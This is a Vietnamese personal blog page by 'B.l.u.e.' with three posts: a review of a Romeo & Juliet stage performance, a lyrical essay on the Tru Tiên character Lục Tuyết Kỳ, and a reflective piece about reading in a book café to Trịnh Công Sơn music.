Làm dâu trăm họ luôn khó. Anh biết điều đấy. Anh có thể hiểu một phần ý đồ của nhà hát khi treo lơ lửng cái màn hình để chiếu subtitle là giúp mọi người có thể hiểu được câu chuyện. Nếu không có cái màn hình ấy, anh đồ rằng đa phần mọi người sẽ không nghe và hiểu hoàn toàn những gì đang phát ra từ miệng các nghệ sĩ, bởi ngôn ngữ trong vở kịch toàn tiếng Anh cổ, khó hiểu ngay cả với người Anh bản xứ. Nhưng, cái màn hình ấy cũng tạo hiệu ứng mọi người nhìn lên đấy quá nhiều, khiến đôi khi bỏ sót các góc rất nhỏ trên sân khấu, như đoạn Romeo nằm ngay sát tận cùng bên phải cánh gà, hay vẻ ngượng ngùng của Juliet khi phát hiện Romeo đang núp dưới ban công, nghe hết lời mình thổ lộ…

Nếu là anh, có lẽ anh cũng sẽ không biết giải quyết sao để cho mọi người vừa tập trung vào diễn biến trên sân khấu, vừa hiểu được vở kịch. Thôi thì, đành chấp nhận, vì mình dốt. Nhưng giá như subtitle bằng tiếng Anh thì thú vị hơn nhiều, bởi có những câu thơ sonnet rất khó dịch ra tiếng Việt làm sao để hợp với vần điệu của nó. Và nếu đã bỏ 150k (với điều kiện mua 10 vé), 300k, 500k ra để vào xem một vở kịch, thì, cứ cho là áp đặt chủ quan đi, có lẽ đều kha khá tiếng Anh. Vậy thì việc chiếu subtitle tiếng Việt là không hợp lí lắm.

Nãy giờ nói dông dài về những cái ngoại cảnh, giờ anh đi vào bản thân vở kịch được trình chiếu nhé.

Một tác phẩm nghệ thuật thành công, là phải đi vào lòng người đọc, và ở đó trong một thời gian dài. Nếu xét trên phương diện này, thì có lẽ vở kịch tối qua không đạt được. Những gì đọng lại trong anh sau hơn hai tiếng đồng hồ là khá nhạt nhoà. Điều này anh có thể lí giải đôi chút, có lẽ anh mong đợi gì đó lớn lao hơn ở vở kịch này, một phần khác là anh đã đọc qua bản nguyên tác văn học của Shakespeare.

Khi mà nhắm mắt lại anh cũng có thể kể vanh vách câu chuyện như thế nào, thì cái suy nghĩ chủ quan của anh, sẽ áp đặt những cảnh trên sân khấu chỉ là mô phỏng, cụ thể hoá cho những gì anh đã biết. Đây là một cái dốt của anh. Các bạn chỉ anh làm sao để thoát ra cái suy nghĩ áp đặt đấy với?

Vở kịch nói bằng tiếng Anh, thoại nhiều, nhưng khi người ta chỉ có thể hiểu lơ mơ về những gì các diễn viên đang nói, thì sẽ không có cảm giác mình bị cuốn vào vở kịch. Có lẽ, diễn ở Việt Nam thế này, thì một vở nhạc kịch, với phần nhạc chiếm đa số, sẽ tốt hơn chăng?

Vở kịch trình diễn tối qua không phải không có những điểm lạ và đẹp. Đấy là cách hiện thực hoá hình ảnh thần tình yêu Cupid và tử thần đầy chết chóc, nhưng vẫn chứa vẻ gì đó đầy hư ảo. Các động tác múa của Cupid nhẹ nhàng, chậm chạp, bất kể là các nhân vật chính trên sân khấu đang như thế nào.

Cũng cần gởi lời khen tới các diễn viên của nhà hát TNT. Với số thành viên (xuất hiện trên sân khấu) rất ít, họ vẫn có thể tái hiện lại hầu như đúng nguyên tác. Ngôn ngữ của vở kịch trong cái nhìn của người hiện đại như anh đã nói ở trên là kiểu cách, sáo rỗng, nhưng diễn xuất rất thật. Hừm, kiểu như đấy là chính họ chứ không phải là đang vào vai nào đó trong một vở kịch.

Một tác phẩm nghệ thuật thành công, là phải đi vào lòng người đọc, và ở đó trong một thời gian dài. Anh nhắc lại câu này. Có thể vở kịch tối qua, sau này anh sẽ chỉ nhớ về nó như là vở kịch Romeo & Juliet đầu tiên mà anh được xem. Nhưng, chính vào cái thời khắc tối qua ấy, anh đã mơ hồ bắt được cái “hồn” của tác phẩm. Đó có thể là sự thù hận lên tới đỉnh điểm qua cách hành xử của Tybalt và Mercutio. Đó là vẻ rất thơ ngây và nhưng đầy nồng cháy của Juliet khi đứng trên lầu thổ lộ lời yêu. Đó cũng là hình ảnh nông nổi nhưng đầy nhiệt huyết của chàng Romeo trẻ tuổi.

Không cần dài lâu, chỉ cần một vài phút giây ấy thôi, là đủ…

B.l.u.e.

Lục Tuyết Kỳ – nhất phiến băng tâm tại ngọc hồ

Bài này viết lâu rồi, từ hồi còn xài bên blog Y360 cơ. Tình cờ hôm nay ngồi lướt lại vài dòng Tru Tiên, lại nhớ tới nàng. Đến giờ, nick YM mà mình thích nhất vẫn là nick luctuyetky…

Lục Tuyết Kỳ

Tôi không tự nhận mình đọc nhiều, những tác phẩm tôi đọc nước ngoài có, trong nước cũng có, truyện ngắn, truyện dài, tiểu thuyết, rất nhiều thể loại… Tôi đã từng suy tư về nhiều nhân vật – đặc biệt là những nhân vật nữ, những bông hoa tươi đẹp nhất trên thế gian này. Tôi đã gặp rất nhiều, đó có thể là những cô gái hồn nhiên, những cô nàng đẹp đẽ, thông minh, hay thậm chí là cả những người phụ nữ khổ tâm, đau khổ, tất cả mỗi người một vẻ. Nhưng đến hôm nay, tôi lại bắt gặp hình tượng một người thiếu nữ tuyệt vời, nàng mang đầy đủ nét đẹp của một giọt sương buổi sớm mai, tinh khiết, trong lành nhưng cũng thật mỏng manh, tình yêu của nàng cũng thế, khắc cốt ghi tâm mãi một bóng hình, mối tình nàng đẹp đẽ bao nhiêu thì lại càng khổ tâm bấy nhiêu, trái tim nàng từng hạnh phúc nhiêu thì nay lại bị dằn vặt bấy nhiêu…

Nhất phiến băng tâm tại ngọc hồ…

Câu thơ trên có vẻ rất đúng với Lục Tuyết Kỳ, cả người nàng luôn toát ra vẻ lạnh như băng, tinh khôi như tuyết… duy chỉ có trái tim của nàng là luôn luôn ấm nóng. Mười năm… điều gì có thể khiến một người con gái khắc cốt ghi tâm hình bóng của một chàng trai suốt mười năm trời ròng rã? Điều gì có thể khiến một cao thủ thuộc hàng nhất lưu trong danh môn chánh phái như nàng đem lòng luyến ái, tưởng nhớ một Huyết Công Tử Quỷ Lệ tàn ác vô biên của Ma Giáo? Điều đó không ai giải thích được, có lẽ ngay cả bản thân nàng cũng vậy. Bởi có một lí do đơn giản… con người ta không thể đem ra mổ xẻ, giải thích chi tiết được tình yêu…

Lục Tuyết Kì ngẩng đầu, nhìn trăng sáng bên trời, lặng yên xuất thần. Vẻ mĩ lệ đó, như một bông hoa tinh khiết dưới ánh trăng.

“Từ lúc ban đầu đó, trong lòng ta đã nhớ đến ngươi”.

Nàng nhẹ nhàng, lặng lẽ thốt.

Hình ảnh nữ tử băng sương lãnh đạm này dưới ánh trăng sáng diễn tả hết lòng mình sao mà đẹp quá! Tình yêu của nàng và hắn đến hầu như ngay từ phút giây đầu tiên nàng đối diện với hắn, phải chăng đó gọi là Một lần gặp gỡ mà thành thiên thu… Thiên thu… hai tiếng đó nghe sao mà dài quá… Mười năm – một đời – thiên thu – trong ba thứ đó thứ nào dài hơn được nỗi nhớ ?

“Đến sau này, chúng ta cùng nhau dưới Tử Linh Uyên Không Tang Sơn, bị Ma Giáo bọn người đó tương sát, lại có âm linh yêu mị vây quanh, ngươi đã bất chấp tính mạng quan tâm ta, cứu ta, ta cũng đã như vậy mà đối với ngươi… “

Ôi Quỷ Lệ ! Giá mà một lần hắn được biết, có bao nhiêu người – dù chỉ là những độc giả biết tới nàng qua những trang sách, vẫn luôn mong được có ngày thế chỗ hắn cùng nàng ở dưới Tử Linh Uyên u tối nhưng tràn ngập ánh sáng của tình yêu – thứ tình yêu không mãnh liệt nhưng nhu mì, không nóng bỏng nhưng dịu dàng, ấm áp đó…

Nàng ! Đẹp biết bao hình ảnh một người con gái mĩ lệ, thanh tú như nàng sẵn sàng làm tất cả vì tình yêu… Tôi còn nhớ hình ảnh nàng ở đầu câu truyện, cùng với hắn tay trong tay ở Không Tang Sơn, dưới một màn đêm tối đen tịch mịch, nguy hiểm nhưng cũng đẹp biết bao! Khung cảnh không lãng mạn nhưng tình người lãng mạn quá. Thiết nghĩ vậy là quá đủ cho hai người có cảm tình với nhau…

“Ngày đó chúng ta thân hãm tuyệt cảnh, sắp chết đến nơi, nhưng ta thực sự không có chút sợ hãi, lúc đó nếu như được chết cùng với ngươi, ta.. “

Nàng quay người, đối diện người con trai đó, trong mắt nàng bừng lên ánh sáng như chưa từng hiện hữu, chưa từng xuất hiện, chính là nghìn vạn nhu tình chôn sâu trong thâm tâm, thậm chí khuôn mặt trắng như tuyết của nàng, cũng ẩn hiện nét phơn phớt hồng, vẻ mỹ lệ chấn động tâm phách.

“… Ta cũng cam tâm tình nguyện! ”

Nàng từ tốn nói, nhưng sự kiên định như đoạn băng cắt tuyết.
Thời gian… liệu thời gian có thể làm con người thay đổi ? Có lẽ không, thời gian chỉ có thể làm tình thế giữa hai con người thay đổi chứ không thể nào đổi được tình cảm của hai người. Tình thế nàng và hắn nay đã khác ! Buồn cho nàng, buồn cho hắn, hay buồn cho cả hai đây ? Giờ đây ước nguyện ngày đó được chết cùng với ngươi của nàng có lẽ đã không còn thực hiện được. Hắn vẫn là hắn, chỉ khác nhau ở cái tên Tiểu Phàm và Quỷ Lệ mà thôi. Nhưng… tình thế hiện nay không còn như mười năm trước. Giờ đây nếu chết thì chỉ có một trong hai phải chết. Người kia sẽ dùng máu của người ngã xuống để có thể đoạn tuyệt thêm một phần của kí ức…

Lục Tuyết Kì cười thê lương, mục quang lu mờ, bóng nàng dưới ánh trăng, mĩ lệ buồn bã.

“Ta không hối hận, mười năm qua, trong tim ta luôn lo lắng cho ngươi. Nếu có thể, ta tình nguyện bỏ hết tất cả, theo ngươi cùng nhau tói nơi chân trời góc biển. Nhưng, cuối cùng cũng không thể được”

Nàng cắn môi, trầm giọng, lặp lại từng chữ

” thật không thể nào, không thể…. “

Chân chính tình cảm trên thế gian phải chăng cũng chỉ có thể tới mức này… Chỉ tiếc… tiếc cho một tình yêu không được trọn vẹn, phải chăng cứ tình đầu là phải dang dở, phải đau khổ như thế này…
Con người sống trên đời đã là một dấu chấm hỏi đầy mâu thuẫn. Cũng đừng oán trách nàng tại sao không vượt qua được cái ranh giới Chính – Tà, cái đối lập muôn thuở đó để đến với người nàng yêu. Nàng là một nữ tử đáng thương, mười năm qua nàng đã khổ quá nhiều, ai biết đằng sau vẻ lạnh lùng của nàng là một trái tim luôn nóng cháy! Tôi không thể trách nàng. Sống trên đời vốn có những chuyện mà con người không muốn làm vẫn cứ phải làm. Bởi đó là đời, và con người vẫn luôn là con người…

Lục Tuyết Kỳ – người thiếu nữ đáng thương của tôi, liệu khi Thiên Gia thần kiếm của nàng xuất vỏ, kiếm của nàng

“Mười năm nay, ta si niệm trong lòng, ở hậu sơn múa kiếm, ” Cô lặng lẽ thốt. “Đêm nay, hãy để ta múa một lần cuối cùng”

điệu múa cuối cùng đó, là ai sẽ ra đi, người ra đi hay tình ra đi, không gian chia cắt hay lòng người rẽ chia ?

Ánh trăng thê lương, không gian tịch mịch… liệu trăng có thể buồn bằng đôi mắt nàng, không gian có thể tịch mịch hơn tâm hồn nàng ? Phải chăng dường như có thể đem toàn bộ nỗi thống khổ trên thế gian gom vào đôi mắt ấy ?

Có ai biết trong phút giây đó nàng nghĩ gì? Nàng tưởng nhớ về kỉ niệm trong quá khứ hay nghĩ về tương lai. Quá khứ mang lại gì cho nàng? Mười năm tưởng nhớ há chẳng đủ chăng? Tương lai thì liệu còn điều gì đáng cho nàng phải mơ mộng?

Ôi! Tại sao những người đa tình trên thế gian đều phải cô đơn, tịch mịch… Đa tình tự cổ không dư hận…

Thương cho nàng….

Cafe sách

Cafe

Anh viết những dòng này khi đang ở cafe sách.

Cafe sách dĩ nhiên là có sách, không những thế mà còn có rất nhiều, và có cafe, cafe không phải thuộc dạng ngon lắm, nhưng ở những nơi như thế này, đối với anh, nó không cần phải đặt lên làm ưu tiên hàng đầu.

Anh nói đùa với bạn Ánh Vân rằng, sẽ thích thú biết mấy nếu con người chả phải làm gì cả, chỉ hằng ngày ngồi uống cafe và đọc sách.

Anh viết những dòng này khi đang ở cafe sách.

Cafe sách ngoài cafe và sách thì còn có nhạc. Khi anh bắt đầu mở trang xanhduong lên và gõ, đó là bài Lời buồn thánh. Còn hiện tại, đang là Đêm thấy ta là thác đổ.

Ở Sài Gòn này có một quán cafe rất đặc biệt. Nhạc ở đó mở nhỏ đến mức không thể tin được, chỉ như những âm thanh rì rào theo cơn gió đưa nhẹ vào tai. Có dịp trò chuyện với người chủ quán, anh chỉ nghe ông ấy nói:

Nghe nhạc khác với thưởng thức nhạc, chú cứ tưởng tượng đột nhiên một câu nào đó, đột nhiên thôi nhé, bay vào tai chú. Dĩ nhiên, trong khoảng thời gian chú ngồi ở đây, sẽ có hàng hà vô số câu mà chú nghe được. Nhưng, sẽ có khoảng khắc, chú cảm nhận, câu đó, nốt đó như được phát ra là chỉ để cho chú nghe…

Tình cờ nghe “vì em đã mang lời khấn nhỏ, để tôi đứng bên đời kia…”, anh lại cảm thấy đúng.

Ồ, lại đổi sang một bài nhạc Trịnh khác nữa rồi.

Anh nghe nhạc Trịnh nhiều, nghe rất nhiều version, từ những bài hát mới thu âm, do các giọng ca mới hát, giọng hát nhẹ nhàng của Đức Tuấn, giọng cao vút của Bằng Kiều… cho đến những tên tuổi gạo cội như Khánh Ly hay Lệ Thu. Anh sưu tầm cả những bài nhạc thu trước năm 1975, những bài nhạc trên đĩa than, chất lượng thua xa các đĩa bây giờ, nghe rè rè nhưng rất thật.

Thế nhưng anh không yêu nhạc Trịnh lắm.

Anh thích nghe nhạc Trịnh, nhưng chỉ ở một vài khoảng khắc nào đó thôi. Đối với anh, nhạc Trịnh đến nhẹ nhàng như thế này là tuyệt vời nhất. Kiểu như tự dưng, những lời ca đó, những nốt nhạc đó và tâm trạng anh hoà vào nhau vậy.

Anh tới đây trong cơn mưa rỉ rả…

Anh ngồi đọc sách trong tiếng nhạc rỉ rả…

Anh ngồi bên li cafe và nhìn ra ngoài bầu trời, cảm nhận bầu trời sau cơn mưa thật tươi đẹp…

Còn lòng anh sau cơn mưa, anh chưa cảm nhận thấy…

Hôm nay anh cầm cuốn sách “Cô đơn trên mạng” lên, chợt se lòng khi nhận ra đó là cuốn sách cuối cùng anh tặng cô ấy.

Sách, cafe, Trịnh, kỉ niệm…

Thế là đã quá đủ cho một buổi chiều yên bình rồi nhỉ…

B.l.u.e.

© 2024 B.l.u.e. All rights reserved.

Theme by Anders Norén.